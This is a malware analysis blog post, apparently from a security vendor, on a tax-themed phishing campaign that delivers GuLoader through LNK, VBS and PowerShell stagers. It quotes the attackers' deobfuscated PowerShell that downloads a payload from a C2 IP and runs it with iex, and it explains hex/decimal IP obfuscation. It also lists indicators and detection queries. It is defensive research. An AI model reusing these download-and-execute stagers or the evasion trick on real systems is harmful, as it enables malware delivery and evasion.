By Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov

March 30, 2023, updated April 5, 2023, updated April 18, 2023

Update: TACTICAL#OCTOPUS Campaign continues targeting US victims

While today is the last day for US income tax submissions, the TACTICAL#OCTOPUS campaign continues to target US victims. New samples have once again emerged related to this ongoing threat. 

The GuLoader/CloudEyE malware appears to be the primary malware used to deliver other payloads. Interestingly enough, most of the heavily obfuscated stagers that the Threat Research team tracked initially, were no longer used. Instead, the shortcut file downloads and executes the GuLoader malware directly. 

Like the original infection stage, the malware is delivered to the user via a phishing email using tax-themed lures. The email contains an attached zip file containing the shortcut containing the malicious script which looks similar to the original. 

Figure u_1: Lnk execution

The GuLoader malware is downloaded from hxxps://rebrand[.]ly/spf5wcc and saved as C:\Windows\Tasks\Restler.com, and the lure document is downloaded from hxxps://rebrand[.]ly/uvhzh3f and saved as C:\Users\Public\info.pdf.

The malware along with the lure document are executed simultaneously. Per usual, the lure document is another tax-related file. 

Figure u_2: lure document

Once the GuLoader binary launches, it sleeps for roughly 30 to 60 seconds and then performs process hollowing to one of two IE utilities, the Internet Explorer Low-MIC Utility Tool, ielowutil.exe or ieinstal.exe as we saw previously.

Figure u_3: GuLoader process hollowing to ieisntal.exe

Without going into too much detail, the malware eventually connects back to hxxp://rebrand[.]ly/spf5wcc to download further stagers as well as for persistence.

The Securonix Threat Research Team is keeping a close eye on the TACTICAL#OCTOPUS campaign and will provide updates as we learn more. It’s possible that with the tax season wrapping up in the US that this campaign might shift away from tax-themed lures.

Additional payloads

File Name	SHA256 (IoC)
Shortcut Files
FedTaxUS.pdf.lnk	3fc89d5e3e55c0942c6093eef47d87da6c52d6c459a1ad385ae425bd70863b42
Zip Files (email attachments)
FedTaxUS20&21.zip	6a45856a160185b57a2e0c059f7eced75d3117a2ead0d75c649b50d9077bdf7f
Binary Files
Sinsring Lnningsraadenes.exe	3a76d26eb6d4267c47730b002111153f17deb9ae39bbaedacc1caa7c49d1447e 4d0ebfef45b40e93ec400103685032aadcb2f3427a8a2faa9a70db31bd7e81eb

Update: TACTICAL#OCTOPUS campaign continues as more malicious phishing documents emerge

Since the discovery of the TACTICAL#OCTOPUS campaign, the Securonix Threat Research team has been monitoring this ongoing threat and has uncovered additional related samples and payloads. The most recent of these samples were submitted 04/04/2023. 

Overall, the attack chain appears to have remained the same. A phishing email with a password-protected zip file is delivered to the target using tax-themed lures. However, one noticeable difference is that the attackers have shifted from encoded IP addresses to using known, publicly available URL redirect services, in particular rebrand[.]ly. At the time of writing, the redirect URLs have been blocked by the redirect service.

At this point in time it is safe to assume that the TACTICAL#OCTOPUS campaign is still ongoing and will likely continue (or shift gears) once the tax season in the US wraps up for the April 18th deadline. We will continue to monitor the situation and provide updates as we learn more. 

Additional payloads

File Name	SHA256 (IoC)
Shortcut Files
WINSTON_TAXARCHIVE.pdf.lnk	29201f916b42e013f24a8a0b2543c25ec04e119b4d0969ddd8aff696f84af7ee
FedTaxUS.pdf.lnk	de78ba7cedda5de72f399a0bd7b597e880ebd517144bbeb2dd0a4e12d353d749
CLIENTCOPY.pdf.lnk	fd90d38b7ba7a28b3416c917f8e1f1a670e861fecb9d7402b1aea76ac380589a
SharonYarbrough.pdf.lnk	d739b7a71406d2bc16e579db6edab6c12bc26dab43b0b293e5bd817a185c7b43
Zip Files (email attachments)
JHNGLE8879.zip	95d7840b69fb0e9541422fa841389992e19b3502ee59ad6ad86449211f3b8407
SharonYarbrough.zip	7c5a0ee020e8fb14be5955ee7231191b61f3e077edf638304b046f7d780663bc
C2-hosted files
WATPCSP.dll	a5ac856ce08f5526b013044067e1e74ce5aedf695a4a964025349059800ea763

tl;dr

As the tax deadline on April 15 approaches in the US, threat actors are ramping up tax-related phishing scams to US-based victims to infect systems with stealthy malware.

With tax season in the US drawing to a close, threat actors are showing no sign of slowing down. The Securonix Threat Research team has identified an ongoing hyper-targeted phishing campaign (tracked by Securonix Threat Research as TACTICAL#OCTOPUS) targeting individuals in the US using seemingly valid tax forms and contracts. Some of the lure documents observed contained employee W-2 tax documents, I-9, and real estate purchase contracts.

However, behind the lure document attachment is interesting malware which features stealthy AV evasion tactics, layers of code obfuscation and multiple C2 (command and control) channels. In this article, we’ll walk through the stages and peel back the obfuscated code to get a better understanding of the malware and attack chain.

Attack chain overview

The attack begins with tax-related phishing emails. The email will contain a password-protected zip file, where the password is provided in the body of the email. The attachments follow a common naming convention using tax-like language such as TitleContractDocs.zip or JRCLIENTCOPY3122.zip.
Contained within the .zip file is a single image file (typically a .png file) and a shortcut (.lnk) file. Code execution begins when the user double clicks the shortcut file.

Once code execution begins, a series of VBScript and PowerShell stagers pull further payloads from the C2 server. Eventually we’ll observe in-memory binary code execution through PowerShell reflection techniques using legitimate Windows processes.

Stage 1: initial infection

Code execution begins when the victim user extracts the .zip file contents and executes the shortcut file masquerading as a .pdf link “MOREZT TAX FILES.pdf.lnk”. As seen in the figure below, the .lnk file contains a PowerShell one liner command that downloads the Visual Basic file “Sammenstyrtningens242.vbs” from the attacker’s C2 server, saves it locally as “C:\Windows\Tasks\Tepolerd.vbs” and then runs it.

…encoded IP addresses?

Hold up, let’s pause for a second and talk about that odd looking URL. Believe it or not, it is simply an encoded IP address and there is no DNS resolution of any kind happening behind the scenes. This IP address obfuscation method is documented, but rarely used especially when it comes to mixed notation; however, some IP obfuscation tools can be found online. If you were to copy the URL into your browser or terminal window, you’ll notice that it will be automatically translated into an IP. Let’s describe how this works using a known safer example (Open DNS): 208.67.222.123

The value is essentially a combination of hexadecimal and decimal encoding of an IP address. The first IP octet is encoded using hex, separated by a dot. The remaining octets are then decimal encoded.

0xD0.4447867 essentially translates to 208.67.222.123

The IP address used by the attacker’s .lnk code: 0x05.526436 becomes 5.8.8[.]100
Oddly enough, this method to hide IP addresses only works where at least the first octet is hex encoded. Decimal encoding the first octet with hex proceeding will not work. The graphic below breaks this down with some examples:

Continuing on, the PowerShell script also downloads a file called “info.pdf” and saves it to the local public user’s directory in “C:\Users\Public\infos.pdf”. Once downloaded it is then opened and presented to the user from whatever application is configured as the default PDF viewer.

All the file samples our team analyzed were various forms of tax documents, though none could be verified as being valid. These ranged from several employee W-2 forms to I-9 documents, to real estate contracts. The two W-2 tax forms below appear to be from an Okta employee and another employee of Murray Logan Electricals and Wiring.

These documents are known as lure documents to provide the victim user with an expected result to the action taken (opening a “PDF” file). Even though the goal of the attacker is code execution, a user may get suspicious when nothing happens, hence the need for a valid lure.

Next, let’s circle back to the downloaded .VBS script that gets downloaded and executed just before the lure document opens.

Stage 2: VBS script execution

The VBS script that gets executed from the shortcut file, “Sammenstyrtningens242.vbs” is heavily obfuscated. It contains mostly nonsensical comments, likely to try to bypass or confuse AV detection.

As you can see in the figure above, there is a concatenated PowerShell script contained within the VB script file. This gets executed by the default PowerShell.exe process.

Stage 3: PowerShell execution

The obfuscation methods used in this PowerShell script are a bit unconventional. It involves a function that manipulates any string called into it. Each of the strings (represented in green) are passed into the function “Unrhe9” and converted into valid PowerShell syntax that can then be executed.

The deobfuscated version of the PowerShell script gives us a bit better understanding as to the script’s intent. Overall, the script is quite interesting due to the fact that each line gets invoked individually. Technically, the invokes could be dropped to further enhance readability.

Compounding the variables in the deobfuscated version of the script we get the final few commands that kick off the next phase of code execution.

Start-BitsTransfer -Source “hxxp://5.8.8[.]100/signal/Traverser.dwp” -Destination $env:appdata\Kommaerp.ema

$Unrhe = Get-Content $env:appdata\Kommaerp.ema
$Moatingh = [System.Convert]::FromBase64String($Unrhe));
$Told2 = [System.Text.Encoding]::ASCII.GetString($Moatingh))
$Astrologi=$Told2.substring(183983,19725));
iex($Astrologi)

The same C2 server is now contacted once again to download the file Kommaerp.ema and save it to the user’s Appdata directory (“C:\Users\username\AppData\Roaming”). The file is downloaded using the Start-BitsTransfer PowerShell module.

The Kommaerp.ema file contains a giant Base64 string that gets decoded and parsed by the next few lines of code. The last line simply invokes whatever contained PowerShell code is present as a result as represented by the $Astrologi variable.

Stage 4: PowerShell execution

The next phase of PowerShell execution is derived from the $Astrologi variable as we discovered in the previous stage. Once again, we see another massively obfuscated script as shown in the figure below.

Similar to what we saw in stage 3, obfuscation is mainly handled by a primary function that decodes all of the passed in strings throughout the remainder of the script. Manually deobfuscating the strings using the “Elkaunq02” function makes the PowerShell script a bit more readable.

If you’re familiar with PowerShell in-memory code execution, the code above should look familiar. Similar versions of the same code have been seen in the wild executing a wide range of attacks from Cobalt Strike, to a wide range of backdoor RAT malware including Kovter. It essentially leverages .NET API functionality to allocate memory space for a payload that will be executed within the new memory space.

A new thread is then spawned from our original process containing the payload data. The data in this case is contained inside the $Moatingh variable. This variable was instantiated during stage 3 of the attack. If you look back, you’ll notice the variable is set to the Base64 decoded value of the download file “Kommaerp.ema”.

$Coerciona2=$env:appdata
$Coerciona2=$Coerciona2+’\Kommaerp.ema’
$Unrhe = Get-Content $Coerciona2
$Moatingh = [System.Convert]::FromBase64String($Unrhe));

The second half of the file contains the obfuscated stage 4 PowerShell code which we analyzed in the previous section.

Binary payload analysis

The Windows binary file ieinstal.exe ends up being the victim process for our in-memory process injection technique. This default Windows process is located in C:\Program Files (x86)\Internet Explorer\ and is responsible for installing and managing Internet Explorer add-ons.

In the below figure we’re able to observe the malware migrating from PowerShell and launching ieinstal.exe which then spawns its own thread. The shell code used to inject the process contained within the Kommaerp.ema file is heavily obfuscated at a binary level, however we’ll get into how we’re able to gather some interesting data from the created process.

ieinstal.exe memory dump analysis

Examining the process dump file for ieinstal.exe provides some interesting insights. First, we observed C2 communication back to the original IP address (5.8.8[.]100) from the infected process. Analyzed data within the memory dump confirms that the IP is contacted using the following parameters:

GET /signal/TpRIfutRxWlhn224.dwp HTTP/1.1
User-AgentMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

At this stage, the infection chain is completed and the attackers will have access to the target system. Without pulling additional files from the C2 server, we observed ieinstal.exe capturing clipboard data and keystrokes as soon as it started running.

Additional sample analysis

In addition to the sample featured in this article, we identified several additional samples following the same pattern using unique IP addresses and URL strings. Overall, each sample followed striking similarities such as the tax related PDF (always info.pdf), and PowerShell/VBScript code.

All files and hashes will be provided at the end of the article for references or IoCs.

C2 infrastructure and attribution

Two of three IP addresses identified in the attack were registered to Petersburg Internet Network Ltd. in the Russian Federation. This could indicate Russian origins, however the possibility of false flag operations cannot be ruled out at this point.

C2 domains/IPs

hxxp://109.206.240[.]67/oy/

tcp://goodisgood[.]ru:1977

hxxps://rebrand[.]ly/25a1ba

hxxps://rebrand[.]ly/be263e

hxxps://rebrand[.]ly/m526mvn

hxxps://rebrand[.]ly/rzuw9uy

hxxps://rebrand[.]ly/spf5wcc

hxxps://rebrand[.]ly/uvhzh3f

Conclusion

Since all the samples that Securonix Threat Research identified are fairly recent, it’s clear that this campaign is still ongoing. Businesses and individuals should be extra vigilant when opening tax-related emails, especially as the tax deadline in the US approaches.

The TACTICAL#OCTOPUS campaign is overall relatively complex from an initial compromise standpoint. The initial code execution tactic through .lnk file execution is trivial and used by many threat actors these days. However, the PowerShell and VBScript code used are unique and sophisticated, especially from an AV avoidance and obfuscation standpoint making this campaign important to watch.

Securonix recommendations and mitigations

• Avoid opening any attachments especially those that are unexpected or are from outside the organization. Be extra vigilant with tax-related emails.
• Implement an application whitelisting policy to restrict the execution of unknown binaries.
• Deploy additional process-level logging such as ⦁ Sysmon and ⦁ PowerShel⦁ l logging for additional log detection coverage.
• Securonix customers can scan endpoints using the Securonix Seeder Hunting Queries below.

MITRE ATT&CK Matrix

Analyzed file hashes

A Sample of relevant Securonix detection policies:

• EDR-ALL-1197-RU
• EDR-ALL-1198-RU
• PSH-ALL-227-RU
• PSH-ALL-228-RU
• PSH-ALL-313-RU

Relevant Spotter queries

• index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (destinationprocessname ENDS WITH “powershell.exe” OR filename = “PowerShell.EXE” OR destinationprocessname ENDS WITH “cmd.exe” OR filename = “Cmd.Exe”) AND (resourcecustomfield1 CONTAINS “https://0x” OR resourcecustomfield1 CONTAINS “http://0x”)
• (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR rg_functionality = “Web Proxy”) AND (destinationaddress = “194.180.48[.]211” OR destinationaddress = “5.8.8[.]100” OR destinationaddress = “109.206.240[.]67”)
• index = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS ” -bxor”
• index = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message CONTAINS “System.Reflection.Assembly.Load($” OR message CONTAINS “[System.Reflection.Assembly]::Load($” OR message CONTAINS “[Reflection.Assembly]::Load($” OR message CONTAINS “System.Reflection.AssemblyName” OR message CONTAINS “Reflection.Emit.AssemblyBuilderAccess” OR message CONTAINS “Runtime.InteropServices.DllImportAttribute”) AND (message NOT CONTAINS “Generated by= Microsoft Corporation” OR message NOT CONTAINS “Generated by: Microsoft Corporation”)
• index = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “Start-BitsTransfer” AND message CONTAINS “-Source” AND message CONTAINS “-Destination” AND message CONTAINS “http”

References:

• Microsoft PowerShell Modules: Start-BitsTransfer
  https://learn.microsoft.com/en-us/powershell/module/bitstransfer/start-bitstransfer?view=windowsserver2022-ps
• Inspecting a PowerShell Cobalt Strike Beacon
  https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/
• The many faces of an IP address
  https://www.hacksparrow.com/networking/many-faces-of-ip-address.html#2-0-optimized-dotted-decimal-notation
• RocketCyber: Cyber Cases from the SOC – Fileless Malware Kovter
  https://www.rocketcyber.com/blog-cyber-cases-from-the-soc-fileless-malware-kovter